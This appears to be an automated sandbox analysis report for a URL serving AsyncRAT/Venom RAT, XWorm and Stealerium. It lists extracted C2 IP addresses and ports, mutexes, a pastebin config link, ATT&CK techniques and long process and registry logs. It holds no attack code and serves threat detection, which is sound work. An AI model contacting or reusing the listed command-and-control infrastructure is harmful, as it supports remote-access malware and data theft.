asyncrat | hxxp://tiny-fixtures-glossary-advantage[.]trycloudflare[.]com

Analysis

max time kernel
1051s
max time network
1055s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
18/07/2024, 13:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://tiny-fixtures-glossary-advantage.trycloudflare.com

Score

10^/10

asyncrat stealerium xworm default collection execution persistence privilege_escalation rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

157.20.182.172:7000

157.20.182.172:8000

Mutex

iHRgIbaS0FTMce5d

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Botnet

Default

45.66.231.150:3232

157.20.182.172:3232

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

Mutex

nlthbmfyadihv

Attributes

delay
1
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/zNe6NH5y

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/6408-23545-0x0000026202560000-0x0000026202570000-memory.dmp	family_xworm
behavioral1/memory/3088-23557-0x000002885E260000-0x000002885E270000-memory.dmp	family_xworm

Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 5396 created 3552	5396	python.exe	56
PID 4960 created 3552	4960	python.exe	56
PID 4804 created 3552	4804	python.exe	56
PID 6796 created 3552	6796	python.exe	56
PID 1336 created 3552	1336	python.exe	56

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/memory/6876-23549-0x0000020B6A490000-0x0000020B6A4A6000-memory.dmp	family_asyncrat
behavioral1/memory/4588-23553-0x0000024EAAF90000-0x0000024EAAFA6000-memory.dmp	family_asyncrat
behavioral1/memory/5552-23563-0x00000188AD500000-0x00000188AD518000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
188	2980	powershell.exe
199	5064	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2980	powershell.exe
5064	powershell.exe
4580	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
5396	python.exe
4960	python.exe
4804	python.exe
6796	python.exe
1336	python.exe

Loads dropped DLL 30 IoCs

pid	Process
5396	python.exe
5396	python.exe
5396	python.exe
5396	python.exe
5396	python.exe
5396	python.exe
4960	python.exe
4960	python.exe
4960	python.exe
4960	python.exe
4960	python.exe
4960	python.exe
4804	python.exe
4804	python.exe
4804	python.exe
4804	python.exe
4804	python.exe
4804	python.exe
6796	python.exe
6796	python.exe
6796	python.exe
6796	python.exe
6796	python.exe
6796	python.exe
1336	python.exe
1336	python.exe
1336	python.exe
1336	python.exe
1336	python.exe
1336	python.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
200	pastebin.com
201	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
208	icanhazip.com
211	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	notepad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	notepad.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
7060	timeout.exe
592	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133657847204149260"	chrome.exe

Modifies registry class 51 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\edit	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "5"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\.py	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\edit\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\open\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\벵삭฀谀耋\ = "py_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\벵삭฀谀耋	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\py_auto_file\shell\open	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\.py\ = "py_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 629223.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 7 IoCs

ransomware

pid	Process
3768	NOTEPAD.EXE
4208	NOTEPAD.EXE
3780	NOTEPAD.EXE
5736	NOTEPAD.EXE
3264	NOTEPAD.EXE
1788	NOTEPAD.EXE
1448	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
6408	notepad.exe
3088	notepad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1920	msedge.exe
1920	msedge.exe
852	msedge.exe
852	msedge.exe
3780	identity_helper.exe
3780	identity_helper.exe
5276	msedge.exe
5276	msedge.exe
5760	msedge.exe
5760	msedge.exe
5348	msedge.exe
5348	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
6028	msedge.exe
6028	msedge.exe
6900	msedge.exe
6900	msedge.exe
5884	msedge.exe
5884	msedge.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
4580	powershell.exe
4580	powershell.exe
4580	powershell.exe
5396	python.exe
4960	python.exe
4804	python.exe
6796	python.exe
1336	python.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
3088	notepad.exe
3088	notepad.exe
5552	notepad.exe
5552	notepad.exe
5552	notepad.exe
5552	notepad.exe
5552	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
6876	notepad.exe
4588	notepad.exe
4588	notepad.exe
6876	notepad.exe
6876	notepad.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
5740	OpenWith.exe
6124	OpenWith.exe
7052	OpenWith.exe
3184	OpenWith.exe
2280	OpenWith.exe
3088	notepad.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs

pid	Process
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
5396	python.exe
4960	python.exe
4804	python.exe
6796	python.exe
1336	python.exe
852	msedge.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeRestorePrivilege	724	7zG.exe
Token: 35	724	7zG.exe
Token: SeSecurityPrivilege	724	7zG.exe
Token: SeSecurityPrivilege	724	7zG.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeDebugPrivilege	6408	notepad.exe
Token: SeDebugPrivilege	6876	notepad.exe
Token: SeDebugPrivilege	4588	notepad.exe
Token: SeDebugPrivilege	5552	notepad.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	3088	notepad.exe
Token: SeDebugPrivilege	1628	firefox.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe
Token: SeShutdownPrivilege	6244	chrome.exe
Token: SeCreatePagefilePrivilege	6244	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
1628	firefox.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
852	msedge.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe
6244	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe
5740	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 852 wrote to memory of 468	852	msedge.exe	84
PID 852 wrote to memory of 468	852	msedge.exe	84
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
